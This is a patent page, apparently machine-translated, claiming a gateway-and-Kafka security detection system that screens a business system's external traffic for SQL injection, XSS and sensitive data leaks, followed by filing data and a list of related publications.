It can be clearly understood by those skilled in the art that, for convenience and brevity of description, the specific working processes of the above-described apparatuses and devices may refer to the corresponding processes in the foregoing method embodiments, and are not described herein again.
The embodiments of the present invention have been described in detail with reference to the accompanying drawings, but the present invention is not limited to the above embodiments. Even if various changes are made to the present invention, it is still within the scope of the present invention if they fall within the scope of the claims of the present invention and their equivalents.

Claims (10)

1. The safety detection method based on the open platform is characterized in that the open platform comprises a gateway service, a Kafka message system, a data analysis service and a data processing service; the data security detection method based on the open platform comprises the following steps:
collecting a plurality of functional interfaces of a tested service system, and uniformly accessing to a gateway of an open platform;
acquiring data of each functional interface through gateway service, and bypassing the acquired data to a Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis service reads data in the Kafka message system for security detection, and sends the found data security problem to the data processing service;
and the data processing service sends a corresponding intervention instruction to the gateway service according to the level of the data security problem, so as to realize data flow control and access right control of the functional interface of the tested service system.
2. The open platform based security detection method of claim 1, wherein the data analysis service reading data in Kafka message system for security detection further comprises:
detecting SQL injection;
detection of XSS injection;
detection of sensitive data leaks.
3. The open platform based security detection method of claim 2, wherein the detection of SQL injection further comprises:
and detecting whether the SQL injection vulnerability exists in the data, and if so, pre-compiling the data to avoid the SQL injection of the data.
4. The open platform based security detection method of claim 3, wherein the pre-compiling data further comprises:
calling a preparedState class in JDBC to perform precompilation on data and generate a compiled SQL statement; when the data is executed, the compiled SQL sentences are directly used, and SQL injection is avoided.
5. The open platform based security detection method of claim 2, wherein the detection of XSS injection further comprises:
the data is coded, and attack payload is exposed, so that analysis is facilitated;
performing lexical extraction on the coded data to obtain html data and javascript data;
carrying out grammar detection on the javascript data to obtain a detection result;
and performing semantic judgment according to the grammar detection result to obtain the probability of the data being injected by XSS.
6. The open platform based security detection method of claim 2, wherein the detection of the sensitive data leakage further comprises:
based on natural language processing and text classification algorithm, adopting artificial intelligence theory and machine learning technology, constructing a classification model capable of understanding and identifying natural language, associating documents with one or more predefined categories according to semantic features and formats of text contents, clustering and classifying key data, and monitoring whether data interacted between a tested business system and an external third party contains data of the key categories in real time, so that use and outgoing of the key data are monitored and audited, and sensitive data leakage is avoided.
7. A safety detection device based on an open platform is characterized by comprising:
the interface access module is used for collecting a plurality of functional interfaces of the tested service system and uniformly accessing the gateways of the open platform;
the data acquisition module is used for acquiring data of each functional interface through gateway service and bypassing the acquired data to the Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis module is used for reading data in the Kafka message system through the data analysis service to perform security detection and sending the found data security problem to the data processing service;
and the data processing module is used for sending a corresponding intervention instruction to the gateway service through the data processing service according to the level of the data security problem, so as to realize data flow control and access authority control of the functional interface of the tested business system.
8. The open platform-based security detection apparatus of claim 7, wherein the data analysis module comprises a first detection unit, a second detection unit, and a third detection unit;
the first detection unit is used for detecting SQL injection;
the second detection unit is used for detecting XSS injection;
the third detection unit is used for detecting sensitive data leakage.
9. An open platform-based security detection device, comprising a memory and a processor, wherein the memory stores computer-readable instructions, and the processor executes the computer-readable instructions to implement the open platform-based security detection method according to any one of claims 1 to 6.
10. A computer-readable medium storing a computer program, wherein the computer program, when executed by one or more processors, implements the open platform based security detection method of any one of claims 1 to 6.
CN202110255514.1A 2021-03-09 2021-03-09 Security detection method, device, equipment and storage medium based on open platform Pending CN112861125A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202110255514.1A CN112861125A (en) 2021-03-09 2021-03-09 Security detection method, device, equipment and storage medium based on open platform

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202110255514.1A CN112861125A (en) 2021-03-09 2021-03-09 Security detection method, device, equipment and storage medium based on open platform

Publications (1)

Publication Number Publication Date
CN112861125A true CN112861125A (en) 2021-05-28

Family

ID=75994996

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202110255514.1A Pending CN112861125A (en) 2021-03-09 2021-03-09 Security detection method, device, equipment and storage medium based on open platform

Country Status (1)

Country Link
CN (1) CN112861125A (en)

Similar Documents

Publication Publication Date Title
Alwan et al. Detection and prevention of SQL injection attack: a survey
CN110881044B (en) Computer firewall dynamic defense security platform
Ko Execution Monitoring of security-critical programs in a distributed system: a specification-based approach
CN112685737A (en) APP detection method, device, equipment and storage medium
Almorsy et al. Supporting automated vulnerability analysis using formalized vulnerability signatures
CN108156131A (en) Webshell detection methods, electronic equipment and computer storage media
Yeole et al. Analysis of different technique for detection of SQL injection
Dalai et al. Neutralizing SQL injection attack using server side code modification in web applications
Nagpal et al. SECSIX: security engine for CSRF, SQL injection and XSS attacks
Zhang et al. Efficiency and effectiveness of web application vulnerability detection approaches: A review
US11297091B2 (en) HTTP log integration to web application testing
Deng et al. Lexical analysis for the webshell attacks
RU2659482C1 (en) Protection of web applications with intelligent network screen with automatic application modeling
Naderi-Afooshteh et al. Joza: Hybrid taint inference for defeating web application sql injection attacks
Das et al. Detection of cross-site scripting attack under multiple scenarios
Lin et al. The automatic defense mechanism for malicious injection attack
Dwivedi et al. SQLAS: Tool to detect and prevent attacks in php web applications
Bedeković et al. The Importance of Developing Preventive Techniques for SQL Injection Attacks
Woodraska et al. Security mutation testing of the FileZilla FTP server
Sharma et al. Explorative study of SQL injection attacks and mechanisms to secure web application database-A
CN112861125A (en) Security detection method, device, equipment and storage medium based on open platform
Sarjitus et al. Neutralizing SQL injection attack on web application using server side code modification
Kusuma Analysis of SQL injection attacks on website service
George et al. A proposed framework against code injection vulnerabilities in online applications
Ingle et al. Attacks on web based software and modelling defence mechanisms

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination